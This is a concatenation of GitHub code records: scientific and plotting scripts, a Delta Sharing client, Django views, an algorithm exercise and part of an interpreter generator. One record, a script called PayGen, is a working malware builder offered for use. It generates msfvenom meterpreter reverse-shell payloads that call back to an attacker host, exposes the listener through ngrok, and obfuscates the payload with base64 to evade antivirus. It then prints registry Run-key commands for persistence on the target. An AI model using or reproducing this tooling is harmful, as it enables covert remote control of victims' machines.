1\n\n f.close()\n \n # convert to adjacency list\n o = adjacency_list(n, edge_u, edge_v)\n\n # sum degrees of neighbors\n counts = np.empty(n, dtype=np.int)\n for key in o:\n elems = o[key]\n count = 0\n for i in range(len(elems)):\n count += len(o[elems[i]])\n counts[key-1] = count\n\n # save output file\n outhandle = open(os.path.join(os.path.split(os.getcwd())[0], \"output\", \"Algorithmic_005.txt\"), 'w')\n print >> outhandle, ' '.join(map(str, counts))\n outhandle.close()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"cdeterman/Rosalind","sub_path":"Algorithmic_005_DDEG/Algorithmic_005_DDEG.py","file_name":"Algorithmic_005_DDEG.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"75"} +{"seq_id":"74140166642","text":"from itertools import chain\nfrom typing import BinaryIO, List, Optional, Sequence, TextIO, Tuple, Union\nfrom pathlib import Path\n\nimport pandas as pd\n\ntry:\n from pyspark.sql import DataFrame as PySparkDataFrame\nexcept ImportError:\n pass\n\nfrom delta_sharing.protocol import DeltaSharingProfile, Schema, Share, Table\nfrom delta_sharing.reader import DeltaSharingReader\nfrom delta_sharing.rest_client import DataSharingRestClient\n\n\ndef _parse_url(url: str) -> Tuple[str, str, str, str]:\n \"\"\"\n :param url: a url under the format \"#..\"\n :return: a tuple with parsed (profile, share, schema, table)\n \"\"\"\n shape_index = url.rfind(\"#\")\n if shape_index < 0:\n raise ValueError(f\"Invalid 'url': {url}\")\n profile = url[0:shape_index]\n fragments = url[shape_index + 1 :].split(\".\")\n if len(fragments) != 3:\n raise ValueError(f\"Invalid 'url': {url}\")\n share, schema, table = fragments\n if len(profile) == 0 or len(share) == 0 or len(schema) == 0 or len(table) == 0:\n raise ValueError(f\"Invalid 'url': {url}\")\n return (profile, share, schema, table)\n\n\ndef load_as_pandas(url: str) -> pd.DataFrame:\n \"\"\"\n Load the shared table using the give url as a pandas DataFrame.\n\n :param url: a url under the format \"#..
\"\n :return: A pandas DataFrame representing the shared table.\n \"\"\"\n profile_json, share, schema, table = _parse_url(url)\n profile = DeltaSharingProfile.read_from_file(profile_json)\n return DeltaSharingReader(\n table=Table(name=table, share=share, schema=schema),\n rest_client=DataSharingRestClient(profile),\n ).to_pandas()\n\n\ndef load_as_spark(url: str) -> \"PySparkDataFrame\": # noqa: F821\n \"\"\"\n Load the shared table using the give url as a Spark DataFrame. `PySpark` must be installed, and\n the application must be a PySpark application with the Apache Spark Connector for Delta Sharing\n installed.\n\n :param url: a url under the format \"#..
\"\n :return: A Spark DataFrame representing the shared table.\n \"\"\"\n try:\n from pyspark.sql import SparkSession\n except ImportError:\n raise ImportError(\"Unable to import pyspark. `load_as_spark` requires PySpark.\")\n\n spark = SparkSession.getActiveSession()\n assert spark is not None, (\n \"No active SparkSession was found. \"\n \"`load_as_spark` requires running in a PySpark application.\"\n )\n return spark.read.format(\"deltaSharing\").load(url)\n\n\nclass SharingClient:\n \"\"\"\n A Delta Sharing client to query shares/schemas/tables from a Delta Sharing Server.\n \"\"\"\n\n def __init__(self, profile: Union[str, BinaryIO, TextIO, Path, DeltaSharingProfile]):\n if not isinstance(profile, DeltaSharingProfile):\n profile = DeltaSharingProfile.read_from_file(profile)\n self._profile = profile\n self._rest_client = DataSharingRestClient(profile)\n\n def list_shares(self) -> Sequence[Share]:\n \"\"\"\n List shares that can be accessed by you in a Delta Sharing Server.\n\n :return: the shares that can be accessed.\n \"\"\"\n shares: List[Share] = []\n page_token: Optional[str] = None\n while True:\n response = self._rest_client.list_shares(page_token=page_token)\n shares.extend(response.shares)\n page_token = response.next_page_token\n if page_token is None:\n return shares\n\n def list_schemas(self, share: Share) -> Sequence[Schema]:\n \"\"\"\n List schemas in a share that can be accessed by you in a Delta Sharing Server.\n\n :param share: the share to list.\n :return: the schemas in a share.\n \"\"\"\n schemas: List[Schema] = []\n page_token: Optional[str] = None\n while True:\n response = self._rest_client.list_schemas(share=share, page_token=page_token)\n schemas.extend(response.schemas)\n page_token = response.next_page_token\n if page_token is None:\n return schemas\n\n def list_tables(self, schema: Schema) -> Sequence[Table]:\n \"\"\"\n List tables in a schema that can be accessed by you in a Delta Sharing Server.\n\n :param schema: the schema to list.\n :return: the tables in a schema.\n \"\"\"\n tables: List[Table] = []\n page_token: Optional[str] = None\n while True:\n response = self._rest_client.list_tables(schema=schema, page_token=page_token)\n tables.extend(response.tables)\n page_token = response.next_page_token\n if page_token is None:\n return tables\n\n def list_all_tables(self) -> Sequence[Table]:\n \"\"\"\n List all tables that can be accessed by you in a Delta Sharing Server.\n\n :return: all tables that can be accessed.\n \"\"\"\n shares = self.list_shares()\n schemas = chain(*(self.list_schemas(share) for share in shares))\n return list(chain(*(self.list_tables(schema) for schema in schemas)))\n","repo_name":"aalbu/aalbu-delta-sharing","sub_path":"python/delta_sharing/delta_sharing.py","file_name":"delta_sharing.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12481209205","text":"import numpy as np\nimport sys\n\nfrom fealpy.pde.poisson_model_2d import CrackData, LShapeRSinData, CosCosData, KelloggData, SinSinData, ffData\nfrom fealpy.vem import PoissonVEMModel \nfrom fealpy.mesh.adaptive_tools import AdaptiveMarker \nfrom fealpy.tools.show import showmultirate\nfrom fealpy.quadrature import TriangleQuadrature \n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nm = int(sys.argv[1])\nmaxit = int(sys.argv[2])\np = int(sys.argv[3])\n\nif m == 1:\n pde = KelloggData()\n quadtree = pde.init_mesh(n=4)\nelif m == 2:\n pde = LShapeRSinData() \n quadtree = pde.init_mesh(n=4)\nelif m == 3:\n pde = CrackData()\n quadtree = pde.init_mesh(n=4)\nelif m == 4:\n pde = CosCosData()\n quadtree = pde.init_mesh(n=2)\nelif m == 5:\n pde = SinSinData()\n quadtree = pde.init_mesh(n=3)\nelif m == 6:\n pde = ffData()\n quadtree = pde.init_mesh(n=2)\n\n\n\n\ntheta = 0.2\n\nk = maxit - 15 \nerrorType = ['$\\| u_I - u_h \\|_{l_2}$',\n '$\\|\\\\nabla u_I - \\\\nabla u_h\\|_A$',\n '$\\| u - \\Pi^\\Delta u_h\\|_0$',\n '$\\|\\\\nabla u - \\\\nabla \\Pi^\\Delta u_h\\|$',\n '$\\|\\\\nabla \\Pi^\\Delta u_h - \\Pi^\\Delta G(\\\\nabla \\Pi^\\Delta u_h) \\|$'\n ]\nNdof = np.zeros((maxit,), dtype=np.int)\nerrorMatrix = np.zeros((len(errorType), maxit), dtype=np.float)\nmesh = quadtree.to_pmesh()\n\nintegrator = TriangleQuadrature(6)\nfor i in range(maxit):\n print('step:', i)\n vem = PoissonVEMModel(pde, mesh, p=p, integrator=integrator)\n vem.solve()\n eta = vem.recover_estimate(residual=True)\n Ndof[i] = vem.vemspace.number_of_global_dofs()\n errorMatrix[0, i] = vem.l2_error()\n errorMatrix[1, i] = vem.uIuh_error() \n errorMatrix[2, i] = vem.L2_error()\n errorMatrix[3, i] = vem.H1_semi_error()\n errorMatrix[0, i] = np.sqrt(np.sum(eta**2))\n if i < maxit - 1:\n quadtree.refine(marker=AdaptiveMarker(eta, theta=theta))\n mesh = quadtree.to_pmesh()\n\nmesh.add_plot(plt, cellcolor='w')\n\nfig2 = plt.figure()\nfig2.set_facecolor('white')\naxes = fig2.gca(projection='3d')\nx = mesh.node[:, 0]\ny = mesh.node[:, 1]\ntri = quadtree.leaf_cell(celltype='tri')\naxes.plot_trisurf(x, y, tri, vem.uh[:len(x)], cmap=plt.cm.jet, lw=0.0)\n\nshowmultirate(plt, k, Ndof, errorMatrix, errorType)\nplt.show()\n\n","repo_name":"wubangminlll/fealpy.why","sub_path":"example/PoissonAdaptiveVEM.py","file_name":"PoissonAdaptiveVEM.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37549617723","text":"from pprint import pprint\n\ndef diffusion(arr, x, y):\n stack = [x, y]\n while stack:\n y = stack.pop()\n x = stack.pop()\n for dx, dy in idx:\n while 0 <= x+dx < N and 0 <= y+dy < M and arr[x+dx][y+dy] == 0:\n arr[x+dx][y+dy] = 2\n stack.extend([x+dx, y+dy])\n\n\ndef findzero(arr):\n zero = []\n for i in range(N):\n for j in range(M):\n if arr[i][j] == 0:\n zero += [[i, j]]\n return zero\n\n\ndef findvirus(arr):\n virus = []\n for i in range(N):\n for j in range(M):\n if arr[i][j] == 2:\n virus += [[i, j]]\n return virus\n\n\ndef combination(arr=[], idx=-1):\n if len(arr) == 3:\n res.append(arr)\n return 0\n for i in range(idx+1, len(zero)):\n combination(arr+[zero[i]], i)\n\n\nN, M = map(int, input().split())\nboard = [list(map(int, input().split())) for _ in range(N)]\nidx = [[-1, 0], [1, 0], [0, -1], [0, 1]]\nzero = findzero(board)\nvirus = findvirus(board)\nres = []\ncombination()\nsafety = 0\nfor x, y, z in res:\n newboard = [j[:] for j in board]\n newboard[x[0]][x[1]] = 1\n newboard[y[0]][y[1]] = 1\n newboard[z[0]][z[1]] = 1\n for i, j in virus:\n diffusion(newboard, i, j)\n s = 0\n for i in newboard:\n s += i.count(0)\n if s > safety:\n safety = s\nprint(safety)\n","repo_name":"seoul-ssafy-class-2-studyclub/hyeonhwa","sub_path":"baekjoon/14502.py","file_name":"14502.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"31251787183","text":"import matplotlib.pyplot as plt\nimport sys\nimport pandas as pd\n\nfig = plt.gcf()\nfig.set_size_inches(4.5,4)\n\ndf = pd.read_csv('pips_baseline.csv')\ndf1 = pd.read_csv('pips_scouts.csv')\ndf1['n'] = df1['id'].map(lambda x: int(x[-3:]))\ndf['n'] = df['id'].map(lambda x: int(x[-3:]))\nper_scouts = {'1':[],'2':[], '3': [], '4':[],'5': [], '8':[]}\nfor r in df1.iterrows():\n row = r[1]\n baseline = df[df['n']==row['n']].to_numpy()[0][2]\n print(per_scouts[str(row['scouts'])])\n per_scouts[str(row['scouts'])] = per_scouts[str(row['scouts'])]+[row['cumulative_ipc']/baseline]\n\nper_scouts['4']=4*[pd.read_csv('pips_sm.csv')['ratio'].mean()] #for the baseline\nprint(per_scouts)\nx = []\ny = []\nfor k,v in per_scouts.items():\n x.append(k)\n y.append(sum(v)/4)\nprint(x)\nprint(y)\nax = plt.gca()\nintervals = [1.18,1.2,1.22,1.24,1.26,1.28]\nplt.grid(axis='y',zorder=0)\nax.set_yticks(intervals)\nplt.ylim(1.18,1.28)\nplt.bar(x,y,zorder=3)\nplt.ylabel(\"Speedup\",fontsize=12)\nplt.xlabel(\"N Scouts\",fontsize=12)\nplt.tight_layout()\nplt.savefig('pips_scouts.eps',format='eps')\nplt.show()\n\n\n# fig = plt.gcf()\n# fig.set_size_inches(4.5,4)\n\n# df = pd.read_csv('pips_baseline.csv')\n# df1 = pd.read_csv('pips_tag2.csv')\n# df1['n'] = df1['id'].map(lambda x: int(x[-3:]))\n# df['n'] = df['id'].map(lambda x: int(x[-3:]))\n# per_tag = {'2': [], '4': [], '8':[],'12':[],'16':[],'24':[]}\n\n# per_tag['16']=4*[pd.read_csv('tap_sm.csv')['ratio'].mean()] #for the baseline\n# for r in df1.iterrows():\n# row = r[1]\n# if str(row['tag'])=='13' or str(row['tag'])=='15':\n# continue \n# baseline = df[df['n']==row['n']].to_numpy()[0][2]\n# per_tag[str(row['tag'])] = per_tag[str(row['tag'])]+[row['cumulative_ipc']/baseline]\n\n# x = []\n# y = []\n# for k,v in per_tag.items():\n# x.append(k)\n# y.append(sum(v)/4)\n\n# ax = plt.gca()\n# intervals = [0.95,1,1.05,1.1,1.15,1.2,1.25,1.3,1.35,1.4]\n# plt.grid(axis='y',zorder=0)\n# ax.set_yticks(intervals)\n# plt.ylim(0.9,1.35)\n# plt.bar(x,y,zorder=3,color='darkblue')\n# plt.ylabel(\"Speedup\",fontsize=12)\n# plt.xlabel(\"Tag Size\",fontsize=12)\n# plt.tight_layout()\n# plt.savefig('pips_tags.eps',format='eps')\n# plt.show()\n","repo_name":"jfswitzer/240C_22","sub_path":"jens_scripts/pips_dse.py","file_name":"pips_dse.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73274619763","text":"from django.shortcuts import render\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\nfrom ku_manam.models import Article, Comment\nfrom .forms import ArticleForm, CommentForm\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom django.http import HttpResponseNotAllowed\n\ndef allarticles(request):\n page = request.GET.get('page', '1') # 페이지\n kw = request.GET.get('kw', '') # 검색어\n article_list = Article.objects.order_by('-create_date')\n if kw:\n article_list = article_list.filter(\n Q(subject__icontains=kw) | # 제목 검색\n Q(content__icontains=kw) # 내용 검색\n ).distinct()\n paginator = Paginator(article_list, 10) # 페이지당 10개씩 보여주기\n page_obj = paginator.get_page(page)\n context = {'article_list': page_obj, 'page': page, 'kw': kw}\n return render(request, 'community/allarticles.html', context)\n\n##자율동아리 모집\ndef recruitment(request):\n page = request.GET.get('page', '1') # 페이지\n kw = \"모집\"\n article_list = Article.objects.order_by('-create_date')\n if kw:\n article_list = article_list.filter(\n Q(category=\"모집\")\n ).distinct()\n paginator = Paginator(article_list, 10) # 페이지당 10개씩 보여주기\n page_obj = paginator.get_page(page)\n context = {'article_list': page_obj}\n return render(request, 'community/recruitment.html', context)\n\n##프로그램 신청\ndef proposal(request):\n page = request.GET.get('page', '1') # 페이지\n kw = \"신청\"\n article_list = Article.objects.order_by('-create_date')\n if kw:\n article_list = article_list.filter(\n Q(category=\"신청\")\n ).distinct()\n paginator = Paginator(article_list, 10) # 페이지당 10개씩 보여주기\n page_obj = paginator.get_page(page)\n context = {'article_list': page_obj}\n return render(request, 'community/proposal.html', context)\n\ndef detail(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n context = {'article': article}\n return render(request, 'community/question_detail.html', context)\n\n@login_required(login_url='common:login')\ndef question_create(request):\n if request.method == 'POST':\n form = ArticleForm(request.POST)\n if form.is_valid():\n article = form.save(commit=False)\n article.author = request.user\n article.create_date = timezone.now()\n article.save()\n return redirect('community:allarticles')\n else:\n form = ArticleForm()\n context = {'form': form}\n return render(request, 'community/question_form.html', context)\n\n@login_required(login_url='common:login')\ndef answer_create(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.create_date = timezone.now()\n comment.article = article\n comment.save()\n return redirect('community:detail', article_id=article.id)\n else:\n return HttpResponseNotAllowed('Only POST is possible.')\n context = {'article': article, 'form': form}\n return render(request, 'community/question_detail.html', context)\n\n@login_required(login_url='common:login')\ndef question_modify(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n if request.user != article.author:\n messages.error(request, '수정 권한이 없습니다')\n return redirect('community:detail', article_id=article.id)\n if request.method == \"POST\":\n form = ArticleForm(request.POST, instance=article)\n if form.is_valid():\n article = form.save(commit=False)\n article.modify_date = timezone.now() # 수정일시 저장\n article.save()\n return redirect('community:detail', article_id=article.id)\n else:\n form = ArticleForm(instance=article)\n context = {'form': form}\n return render(request, 'community/question_form.html', context)\n\n@login_required(login_url='common:login')\ndef question_delete(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n if request.user != article.author:\n messages.error(request, '삭제 권한이 없습니다')\n return redirect('community:detail', article_id=article.id)\n article.delete()\n return redirect('community:allarticles')\n\n@login_required(login_url='common:login')\ndef answer_modify(request, comment_id):\n comment = get_object_or_404(Comment, pk=comment_id)\n if request.user != comment.author:\n messages.error(request, '수정 권한이 없습니다')\n return redirect('community:detail', article_id=comment.article.id)\n if request.method == \"POST\":\n form = CommentForm(request.POST, instance=comment)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.modify_date = timezone.now()\n comment.save()\n return redirect('community:detail', article_id=comment.article.id)\n else:\n form = CommentForm(instance=comment)\n context = {'comment': comment, 'form': form}\n return render(request, 'community/answer_form.html', context)\n\n@login_required(login_url='common:login')\ndef answer_delete(request, comment_id):\n comment = get_object_or_404(Comment, pk=comment_id)\n if request.user != comment.author:\n messages.error(request, '삭제 권한이 없습니다')\n else:\n comment.delete()\n return redirect('community:detail', article_id=comment.article.id)\n\n@login_required(login_url='common:login')\ndef like(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n if request.user in article.like_users.all():\n article.like_users.remove(article.author)\n else:\n article.like_users.add(request.user)\n return redirect('community:detail', article.id)","repo_name":"hwangmina/manam","sub_path":"community/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6202,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"13059357534","text":"import os\nimport string\nimport random\nimport time\nimport requests\nimport base64\n\n\n\n\nclass Encrypt:\n def __init__(self):\n self.YELLOW, self.GREEN = '\\33[93m', '\\033[1;32m'\n self.text = \"\"\n self.enc_txt = \"\"\n\n def encrypt(self, filename):\n print(f\"\\n{self.YELLOW}[*] Encrypting Source Codes...\")\n with open(filename, \"r\") as f:\n lines_list = f.readlines()\n for lines in lines_list:\n self.text += lines\n\n self.text = self.text.encode()\n self.enc_txt = base64.b64encode(self.text)\n\n with open(filename, \"w\") as f:\n f.write(f\"import base64; exec(base64.b64decode({self.enc_txt}))\")\n time.sleep(2)\n print(f\"{self.GREEN}[+] Code Encrypted\\n\")\n\nLen = 8\nrandomtask = ''.join(random.choices(string.ascii_uppercase + string.digits, k=Len))\n\n\ndef Banner():\n os.system(\"clear\")\n print(Green+\"\"\" \n ____ __ _ _ ___ ____ _ _ \n( _ \\ /__\\ ( \\/ )/ __)( ___)( \\( )\n )___//(__)\\ \\ /( (_-. )__) ) ( \n(__) (__)(__)(__) \\___/(____)(_)\\_)\nCoded By youhacker55\n\nDon t upload Payload To VirusTotal \n \"\"\")\n\nz = random.randint(40,50)\n\nS = z\n\nran = ''.join(random.choices(string.ascii_uppercase + string.digits, k=S))\n\n\nRed =\"\\u001b[31m\"\nGreen =\"\\u001b[32m\"\ndef listeners():\n listen = input(Green+\"do you want to start multi/handler:\")\n if listen == \"yes\":\n with open(\"handlers/\"+payloadname+\".rc\",\"w\") as hand:\n hand.write(\"use multi/handler\\n\")\n hand.write(\"set payload windows/meterpreter/reverse_\"+prot+\"\\n\")\n hand.write(\"set lhost \"+lhost+\"\\n\")\n hand.write(\"set lport \"+lport+\"\\n\")\n hand.write(\"exploit\")\n hand.close()\n os.system(\"sudo msfconsole -r handlers/\"+payloadname+\".rc\")\ndef ngrokhandler(nglport,prot):\n with open(\"handlers/ngrok.rc\", \"w\") as hand:\n hand.write(\"use multi/handler\\n\")\n hand.write(\"set payload windows/meterpreter/reverse_\" + prot + \"\\n\")\n hand.write(\"set lhost 0.0.0.0 \\n\")\n hand.write(\"set lport \" + nglport + \"\\n\")\n hand.write(\"exploit\")\n hand.close()\n\n\n\ndef inplace_change(filename, old_string, new_string):\n with open(filename) as f:\n s = f.read()\n if old_string not in s:\n return\n\n with open(filename, 'w') as f:\n s = s.replace(old_string, new_string)\n f.write(s)\n\nBanner()\nprint(Red+\"\"\"\n1)Generate Payload\n2)AutoPortForwarding(Ngrok)\n3)Help Me With Persistence\n\"\"\")\nchoose = int(input(\"root@Gen:\"))\n\nif choose == 1:\n lhost = input(Green+\"entre Lhost:\")\n lport = input(Green+\"entre Lport:\")\n prot=input(Green+\"Payload_Type(tcp,https):\")\n payloadname = input(Green + \"entre PayloadName:\")\n os.system(\"msfvenom -p windows/meterpreter/reverse_\" + prot + \" LHOST=\" + lhost + \" LPORT=\" + lport + \" SessionExpirationTimeout=0 SessionCommunicationTimeout=0 exitfunc=process -f psh-cmd -o payload.bat >/dev/null 2>&1\")\n print(Green + \"[*]Generating Payload\")\n inplace_change(\"payload.bat\", \"%COMSPEC%\", \"cmd.exe\")\n with open(\"payload.bat\") as reverseshell:\n thepay = reverseshell.read()\n os.system(\"cp -r template/payload.py payloads/\")\n os.system(\"cd payloads/ && mv payload.py \" + payloadname + \".py\")\n inplace_change(\"payloads/\" + payloadname + \".py\", \"changeme\", thepay)\n inplace_change(\"payloads/\" + payloadname + \".py\", \"RANDROMSTRING\", ran)\n\n print(\"Adding Some Junk Code To Evade AV :)\")\n time.sleep(1)\n os.remove(\"payload.bat\")\n enc = Encrypt()\n enc.encrypt(\"payloads/\" + payloadname + \".py\")\n print(\"Payload Saved in payloads/\")\n time.sleep(5)\n listeners()\nelif choose == 2:\n\n try:\n prot = input(Green + \"Payload_Type(tcp,https):\")\n payloadname = input(Green + \"entre PayloadName:\")\n port = input(\"entre ngrok localport:\")\n ngrokhandler(port,prot)\n os.system(\"xterm -fg green -bg black -e ngrok tcp \" + port + \" & \")\n time.sleep(5)\n\n url = \"http://127.0.0.1:4040/api/tunnels\"\n recived = requests.get(url)\n tcp = recived.json()[\"tunnels\"][0][\"public_url\"]\n ngrokhost = (tcp[6:20])\n ngrokport = (tcp[21:])\n os.system(\"msfvenom -p windows/meterpreter/reverse_\" + prot + \" LHOST=\" + ngrokhost + \" LPORT=\" + ngrokport + \" SessionExpirationTimeout=0 SessionCommunicationTimeout=0 exitfunc=process -f psh-cmd -o payload.bat >/dev/null 2>&1\")\n print(Green + \"[*]Generating Payload\")\n inplace_change(\"payload.bat\", \"%COMSPEC%\", \"cmd.exe\")\n with open(\"payload.bat\") as reverseshell:\n thepay = reverseshell.read()\n os.system(\"cp -r template/payload.py payloads/\")\n os.system(\"cd payloads/ && mv payload.py \" + payloadname + \".py\")\n inplace_change(\"payloads/\" + payloadname + \".py\", \"changeme\", thepay)\n inplace_change(\"payloads/\" + payloadname + \".py\", \"RANDROMSTRING\", ran)\n print(\"Adding Some Junk Code To Evade AV :)\")\n os.remove(\"payload.bat\")\n enc = Encrypt()\n enc.encrypt(\"payloads/\" + payloadname + \".py\")\n print(\"Payload Saved in payloads/\")\n time.sleep(5)\n multhandler = input(\"do you want to start multi/handler:\")\n if multhandler == \"yes\":\n os.system(\"sudo msfconsole -r handlers/ngrok.rc\")\n else:\n exit()\n\n\n\n except requests.ConnectionError:\n print(\"Check Ngrok Authtoken\")\n exit()\n\n\n\n\n\nelif choose == 3:\n admin = input(\"Do you Have Admin Priv:\")\n if admin == \"yes\":\n task = input(\"entre the taskName (Entre For Random 1):\")\n if task == \"\":\n path = input(\"Entre Payload Path on The Target Sys:\")\n command = 'reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"' + randomtask + '\" /t REG_SZ /F /D \"' + path + '\"'\n print(Green+\" Type this on Target Shell ==> \",Red+command+'\\n')\n else:\n path = input(\"Entre Payload Path on The Target Sys:\")\n command = 'reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"' + task + '\" /t REG_SZ /F /D \"' + path + '\"'\n print(Green+\" Type this on Target Shell ==> \",Red+ command)\n else:\n task = input(\"entre the taskName (Entre For Random 1):\")\n if task == \"\":\n path = input(\"Entre Payload Path on The Target Sys:\")\n command = 'reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"'+randomtask +'\" /t REG_SZ /F /D \"'+path+'\"'\n print(Green + \" Type this on Target Shell ==> \", Red + command + '\\n')\n else:\n path = input(\"Entre Payload Path on The Target Sys:\")\n command = 'reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"' +task+ '\" /t REG_SZ /F /D \"' + path + '\"'\n print(Green + \" Type this on Target Shell ==> \", Red + command + '\\n')\n\n\n\n\n\n\n\n\n","repo_name":"TrendingTechnology/PayGen","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"32708026596","text":"import argparse\nimport ast\nimport os\nimport re\nfrom textwrap import dedent\n\nfrom pycparser import parse_file, preprocess_file, CParser\nfrom pycparser.c_generator import CGenerator\n\nfrom interpreter_generator.py_generator import (\n CAstGeneralizerBackend,\n FixupMatchsVisitor,\n FixupConstantsVisitor,\n FixupCallAssignVisitor,\n FixupNullVisitor,\n)\nfrom interpreter_generator.generate_cases import main\n\nDEFAULT_INPUT = os.path.relpath(\n os.path.join(os.path.dirname(__file__), \"generated_cases.c\")\n)\nDEFAULT_OUTPUT = os.path.relpath(\n os.path.join(os.path.dirname(__file__), \"../interpreter/interpreter.py\")\n)\n\n\ndef translate_to_py(filename, output_filename):\n \"\"\"Simply use the c_generator module to emit a parsed AST.\"\"\"\n c_preproc_args = [\n \"-E\", # only run the preprocessor\n \"-Wno-everything\",\n ]\n print(f\"clang {' '.join(c_preproc_args + [filename])}\")\n text = preprocess_file(filename, \"clang\", c_preproc_args)\n text = (\n text.replace(\"((_PyCFunctionFast)(void(*)(void))cfunc)\", \"cfunc\")\n .replace(\"(_PyCFunctionFastWithKeywords)(void(*)(void))\", \"\")\n .replace(\"(_PyCFunctionFast)(void(*)(void))meth\", \"meth\")\n .replace(\"PyObject *(*conv_fn)(PyObject *);\", \"\")\n )\n # text = text.replace(\"__uint16_t\", \"int\").replace(\"unsigned short int\", \"short\")\n with open(\"out.c\", \"w\") as f:\n f.write(text)\n\n parser = CParser()\n tree = parser.parse(text, filename)\n generator = CAstGeneralizerBackend()\n with open(output_filename, \"w\") as o:\n o.write(\n dedent(\n \"\"\"\\\n from typing import Any, List, Callable\n # from pytype.pyc import opcodes as ops\n \n BINARY_OP: Any \n BINARY_SUBSCR: Any \n CALL: Any \n CALL_PY_EXACT_ARGS: Any \n COMPARE_OP: Any \n CO_ASYNC_GENERATOR: Any \n CO_COROUTINE: Any \n CO_ITERABLE_COROUTINE: Any \n CO_OPTIMIZED: Any \n DICT_KEYS_UNICODE: Any \n END_FOR: Any \n FOR_ITER: Any \n FRAME_CREATED: Any \n FRAME_EXECUTING: Any \n FRAME_OWNED_BY_GENERATOR: Any \n FRAME_SUSPENDED: Any \n FVC_ASCII: Any \n FVC_MASK: Any \n FVC_NONE: Any \n FVC_REPR: Any \n FVC_STR: Any \n FVS_HAVE_SPEC: Any \n FVS_MASK: Any \n INLINE_CACHE_ENTRIES_BINARY_OP: Any \n INLINE_CACHE_ENTRIES_BINARY_SUBSCR: Any \n INLINE_CACHE_ENTRIES_CALL: Any \n INLINE_CACHE_ENTRIES_FOR_ITER: Any \n INLINE_CACHE_ENTRIES_LOAD_ATTR: Any \n INLINE_CACHE_ENTRIES_LOAD_GLOBAL: Any \n INLINE_CACHE_ENTRIES_UNPACK_SEQUENCE: Any \n JUMP_BACKWARD: Any \n LOAD_ATTR: Any \n LOAD_CONST: Any \n LOAD_GLOBAL: Any \n METH_FASTCALL: Any \n METH_KEYWORDS: Any \n METH_NOARGS: Any \n METH_O: Any \n POP_JUMP_IF_FALSE: Any \n POP_JUMP_IF_TRUE: Any \n POP_TOP: Any \n PYGEN_ERROR: Any \n PYGEN_NEXT: Any \n PYGEN_RETURN: Any \n STORE_ATTR: Any \n STORE_FAST: Any \n STORE_FAST__LOAD_FAST: Any \n STORE_SUBSCR: Any \n UNPACK_SEQUENCE: Any \n \n ADAPTIVE_COUNTER_IS_ZERO: Callable \n BUILTINS: Callable \n CHECK_EVAL_BREAKER: Callable \n DECREMENT_ADAPTIVE_COUNTER: Callable \n DEOPT_IF: Callable \n DISPATCH: Callable \n DISPATCH_GOTO: Callable \n DISPATCH_INLINED: Callable \n DISPATCH_SAME_OPARG: Callable \n DK_ENTRIES: Callable \n DK_IS_UNICODE: Callable \n DK_UNICODE_ENTRIES: Callable \n DTRACE_FUNCTION_EXIT: Callable \n EMPTY: Callable \n GETITEM: Callable \n GETLOCAL: Callable \n GLOBALS: Callable \n GO_TO_INSTRUCTION: Callable \n INSTR_OFFSET: Callable \n JUMPBY: Callable \n KWNAMES_LEN: Callable \n LOCALS: Callable \n NEXTOPARG: Callable \n POP: Callable \n PREDICT: Callable \n PREDICTED: Callable \n PRE_DISPATCH_GOTO: Callable \n PUSH: Callable \n SECOND: Callable \n SETLOCAL: Callable \n STACK_GROW: Callable \n STACK_LEVEL: Callable \n STACK_SHRINK: Callable \n TOP: Callable \n TRACE_FUNCTION_EXIT: Callable \n \n PyCFunction: Any \n PyCodeObject: Any \n PyDictKeyEntry: Any \n PyDictObject: Any \n PyDictOrValues: Any \n PyDictUnicodeEntry: Any \n PyDictValues: Any \n PyDict_EVENT_MODIFIED: Any \n PyExc_AssertionError: Any \n PyExc_AttributeError: Any \n PyExc_KeyError: Any \n PyExc_NameError: Any \n PyExc_RuntimeError: Any \n PyExc_StopAsyncIteration: Any \n PyExc_StopIteration: Any \n PyExc_SystemError: Any \n PyExc_TypeError: Any \n PyFunctionObject: Any \n PyFunction_Type: Any \n PyGenObject: Any \n PyGen_Type: Any \n PyHeapTypeObject: Any \n PyInterpreterState: Any \n PyListIter_Type: Any \n PyListObject: Any \n PyMethodDef: Any \n PyMethodDescrObject: Any \n PyMethodDescrObject: Any \n PyMethodDescr_Type: Any \n PyMethodDescr_Type: Any \n PyMethod_Type: Any \n PyObject: Any \n PyRangeIter_Type: Any \n PySendResult: Any \n PyThreadState: Any \n PyTupleIter_Type: Any \n PyTupleObject: Any \n PyTuple_Type: Any \n 